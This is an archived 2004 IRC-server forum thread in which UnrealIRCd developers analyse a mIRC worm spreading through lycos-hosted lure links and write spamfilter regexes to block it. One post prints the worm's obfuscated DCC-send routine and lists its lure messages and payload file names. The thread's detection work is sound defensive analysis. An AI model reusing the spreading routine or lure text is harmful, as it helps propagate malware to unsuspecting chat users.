some new trojan (from "lycos")

These are old archives. They are kept for historic purposes only.
Post Reply
Tigra

some new trojan (from "lycos")

Post by Tigra » Fri Apr 16, 2004 12:11 pm

Filter for new trojan, that we have in our irc network:

Code: Select all

spamfilter {
regex "\.lycos\..*/.*server.*/";
target private;
reason "Infected by trojan.";
action gline;
ban-time 1h;

some private messages for this trojan:
[14:53:49] <tolyan> Fotos XXX http://members.lycos.co.uk/iserver4/playboy.avi XXX Fotos

[14:22:26] <FROL> Free pics Girls, Teens http://mitglied.lycos.de/iserver2/katherine.jpg
[14:22:26] <FROL> Mira la foto -> http://membres.lycos.fr/iserver5/andrea.jpg

[14:26:36] <kolbaserka> Pics Models http://utenti.lycos.it/yserver3/viviana.jpg Models Pics

[14:07:42] <pokoyni4ek> No crees en lo paranormal? http://members.lycos.co.uk/iserver4/hada.gif :|

[12:10:33] <yulia> Mira esta foto http://members.lycos.nl/iserver1/ovni.jpg
[12:10:33] <yulia> Mira la foto -> http://membres.lycos.fr/iserver5/andrea.jpg

Guest

Post by Guest » Fri Apr 16, 2004 12:15 pm

I forgot "};" :

Code: Select all

spamfilter {
regex "\.lycos\..*/.*server.*/";
target private;
reason "Infected by trojan.";
action gline;
ban-time 1h;
};

codemastr
Former UnrealIRCd head coder
Posts: 811
Joined: Sat Mar 06, 2004 8:47 pm
Location: United States
Contact:

Post by codemastr » Fri Apr 16, 2004 2:14 pm

It's usually best to make the regexp as specific as possible:

regex "http://.+\.lycos\..+/(y|i)server[0-9]/.+\.(jpg|gif|avi)";

Otherwise, you get false positives. Though to get the best regexp, someone would need to open it up and see what URLs are encoded into it.
-- codemastr

Tigra

Post by Tigra » Fri Apr 16, 2004 3:01 pm

codemastr wrote:It's usually best to make the regexp as specific as possible:

regex "http://.+\.lycos\..+/(y|i)server[0-9]/.+\.(jpg|gif|avi)";

Otherwise, you get false positives. Though to get the best regexp, someone would need to open it up and see what URLs are encoded into it.
ok, thank you for your correction.
Somebody known, what this trojan is?

Syzop
UnrealIRCd head coder
Posts: 1955
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl
Contact:

Post by Syzop » Fri Apr 16, 2004 3:05 pm

Just played a bit around with the 1st url and it looks like (=is recognized as) this: http://securityresponse.symantec.com/av ... gle.d.html

Syzop
UnrealIRCd head coder
Posts: 1955
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl
Contact:

Post by Syzop » Fri Apr 16, 2004 3:47 pm

I'll put on some analyses soon ;)

Syzop
UnrealIRCd head coder
Posts: 1955
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl
Contact:

Post by Syzop » Fri Apr 16, 2004 4:19 pm

http://www.vulnscan.org/tmp/virus/2004-04-16/

Code: Select all

- sends a dcc on-join
  like:
  DCC SEND C:\WINNT\system32\ManualSeduccion.zip 3232236866 2970 123897
  DCC SEND C:\WINNT\system32\avril.zip 3232236866 3169 123897
  DCC SEND C:\WINNT\system32\images.zip 3232236866 3684 123897
  the C:\WINNT\system32\ thing is HARDcoded [!]
  All possible names (prefixed with C:\WINNT\system32\):
  notes.zip
  videos.zip
  xxx.zip
  ManualSeduccion.zip
  postal.zip
  hechizos.zip
  images.zip
  sex.zip
  avril.zip
  AND <nick>.zip, so dynamic :/.
- privatemsgs with one of the following textstrings on-join:
  4,1Free XXX SexVideo 8,1http://membres.lycos.fr/iserver5/sexescene.avi
  0,13Mira la foto 4,1->8,14 http://membres.lycos.fr/iserver5/andrea.jpg
  5No crees en lo paranormal? 14http://members.lycos.co.uk/iserver4/hada.gif :|
  13,1Britney, Christina, Jennifer, etc 8,1http://utenti.lycos.it/yserver3/britney.avi
  4,1Pics Models 13,1http://utenti.lycos.it/yserver3/viviana.jpg4,1 Models Pics
  7,0Aprende a conquistar al sexo opuesto 13,0 http://mitglied.lycos.de/iserver2/seduccion.txt
  4,8Mira esta foto 8,4http://members.lycos.nl/iserver1/ovni.jpg
  4,1Free pics Girls, Teens 8,1http://mitglied.lycos.de/iserver2/katherine.jpg
  12,0Jenifer Love Hewitt Sex Video 4,0http://members.lycos.nl/iserver1/jeniferlove.avi
- quits with url
  * loser (loser@192.168.5.66) Quit (Quit: mirate esto -> http://members.lycos.co.uk/iserver4/playboy.avi)
  seems to be always the same (?)
Urls are simple to block, quitmsg too of course, dcc files are fun because it prefixes them with C:\WINNT\System32\ (see source) [note btw that mirc/most clients just skip everything till the last \ so the file shows up as just 'xxx.zip' etc]...
Here's the dcc send routine:

Code: Select all

Alias sv { var %pb = C:\WINNT\system32 $+ $decode(XGZpbGV6aXAuemlw,m)
  if ($exists(%pb) = $false) { halt } | var %rb = $rand(1,10)
  if (%rb = 1) { .copy -o %pb $nofile(%pb) $+ $decode(bm90ZXMuemlw,m) | Set %bv.file $nofile(%pb) $+ $decode(bm90ZXMuemlw,m) }
  elseif (%rb = 2) { .copy -o %pb $nofile(%pb) $+ $decode(dmlkZW9zLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(dmlkZW9zLnppcA==,m) }
  elseif (%rb = 3) { .copy -o %pb $nofile(%pb) $+ $decode(eHh4LnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(eHh4LnppcA==,m) }
  elseif (%rb = 4) { .copy -o %pb $nofile(%pb) $+ $decode(TWFudWFsU2VkdWNjaW9uLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(TWFudWFsU2VkdWNjaW9uLnppcA==,m) }
  elseif (%rb = 5) { .copy -o %pb $nofile(%pb) $+ $decode(cG9zdGFsLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(cG9zdGFsLnppcA==,m) }
  elseif (%rb = 6) { .copy -o %pb $nofile(%pb) $+ $decode(aGVjaGl6b3Muemlw,m) | Set %bv.file $nofile(%pb) $+ $decode(aGVjaGl6b3Muemlw,m) }
  elseif (%rb = 7) { .copy -o %pb $nofile(%pb) $+ $decode(aW1hZ2VzLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(aW1hZ2VzLnppcA==,m) }
  elseif (%rb = 8) { .copy -o %pb $nofile(%pb) $+ $decode(c2V4LnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(c2V4LnppcA==,m) }
  elseif (%rb = 9) { .copy -o %pb $nofile(%pb) $+ $decode(YXZyaWwuemlw,m) | Set %bv.file $nofile(%pb) $+ $decode(YXZyaWwuemlw,m) }
  elseif (%rb = 10) { .copy -o %pb $nofile(%pb) $+ $me $+ .zip | Set %bv.file $nofile(%pb) $+ $me $+ .zip }
.ignore -rpcntikxu15 $address($nick,1) | csv $nick %bv.file $chan }
As you can see that last one is a bit more annoying coz it uses $me.
but still it can be recognized by c:\winnt\system32\*.zip, but dunnow how many false positives that will have.

Anyway.. dinner ;).

codemastr
Former UnrealIRCd head coder
Posts: 811
Joined: Sat Mar 06, 2004 8:47 pm
Location: United States
Contact:

Post by codemastr » Fri Apr 16, 2004 4:35 pm

Well you could make it a little more strict than just C:\winnt\system32\.*\.zip

Meaning, C:\winnt\system32\[][0-9a-z_-{|}`]+\.zip

I don't have the list of all valid nick chars in front of me, but basically thats what I mean, limit it to just characters that are able to appear in $me. Probably wouldn't reduce false positives by too much, but it might help a bit...

Anyway, to update my filter with the list of files you had,

regex "http://.+\.lycos\..+/(i|y)server[0-9]/[a-z]{4,11}\.(gif|jpg|avi|txt)"

That should pretty much eliminate false positives.
-- codemastr

Syzop
UnrealIRCd head coder
Posts: 1955
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl
Contact:

Post by Syzop » Fri Apr 16, 2004 5:13 pm

@url regex, yeah that looks a bit better than "http://.+\.lycos\..+/[iy]server[0-9]/(sexescene\.avi|andrea\.jpg|hada\.gif|britney\.avi|viviana\.jpg|sed[etc] ;))

As for dcc, another alternative is to use blockdcc:
spamfilter {
regex "C:\\WINNT\\system32\\(notes|videos|xxx|ManualSeduccion|postal|hechizos|images|sex|avril)\.zip";
target dcc;
action blockdcc;
reason "Infected by Gaggle worm";
};
That would have almost-0% false positives but wouldn't catch the 1st dcc block if the random number was '10', but then again.. for 200 joins in an average irc session it would have a block success rate of like >99% (99.9%?)..

Anyway... I'll probably just stick with the c:\winnt\system32\*.zip thingy (well similar to what you said) since I don't see why anyone would use that anyway (at least mIRC doesn't send files as stupid as that ;p).

Syzop
UnrealIRCd head coder
Posts: 1955
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl
Contact:

Post by Syzop » Fri Apr 16, 2004 5:29 pm

Obvious but even smarter solution, combine them! ;)

Code: Select all

spamfilter {
    regex "C:\\WINNT\\system32\\[][0-9a-z_-{|}`]+\.zip";
    target dcc;
    action block;
    reason "Infected by Gaggle worm?";
};

spamfilter {
    regex "C:\\WINNT\\system32\\(notes|videos|xxx|ManualSeduccion|postal|hechizos|images|sex|avril)\.zip";
    target dcc;
    action dccblock;
    reason "Infected by Gaggle worm";
};

spamfilter {
    regex "http://.+\.lycos\..+/[iy]server[0-9]/[a-z]{4,11}\.(gif|jpg|avi|txt)";
    target { private; quit; };
    action block;
    reason "Infected by Gaggle worm";
};
*edit: added target quit and committed*

Post Reply